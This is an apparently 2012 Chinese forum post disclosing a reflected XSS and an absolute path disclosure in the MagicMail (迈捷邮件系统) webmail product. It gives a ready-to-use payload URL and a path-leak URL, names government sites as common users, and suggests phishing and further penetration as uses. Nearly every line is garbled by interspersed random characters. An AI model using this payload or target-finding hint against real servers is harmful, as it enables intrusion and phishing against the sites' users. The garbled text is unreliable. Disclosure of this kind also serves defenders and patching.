今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
3 ?8 d+ F4 j4 l# w0 I) x* r& H, ? `7 J3 C @- Q4 T
; q1 R) W9 a- f) a
包含 一个反射性XSS 以及 绝对路径泄漏
4 _4 t$ Z _ Z& v看了看 貌似全部是linux的。
8 q0 A$ [6 D6 c$ i1 }/ Q1 ^
( j3 a6 x4 z% X1 y: R( E关键字:迈捷邮件系统 by MagicMail7 Q' A2 j6 p$ O3 @* Z0 m
% t+ [7 B$ @7 Y. \4 `可以看到很多政府网站都用这个邮件系统$ L2 Q n: _( ~
+ c* S9 }0 u( Z5 ~* {
绝对路径 http://madman.in/index.php?login_type=declare&language=" D+ [8 @ X: f2 V$ V! W" X
+ V$ B7 j6 w/ G3 u' G3 B' Q7 o: m/ F( m/ i# Y! o) C
; e# L5 i0 b( K, ~9 G* @) L
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E% k. R3 W; Q$ \3 j
+ ?+ A4 M2 Z0 C0 I" }
5 T- }6 ?0 k! j
, ]) g) v3 i( J: j/ i$ p虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
- v& o* M2 J$ L! n
4 R' D8 \: X, \. m修复方案:看官方补丁吧。 |5 v) f. |0 F) X# o8 R
|
发表于 2012-11-9 20:38:41
收藏
支持
反对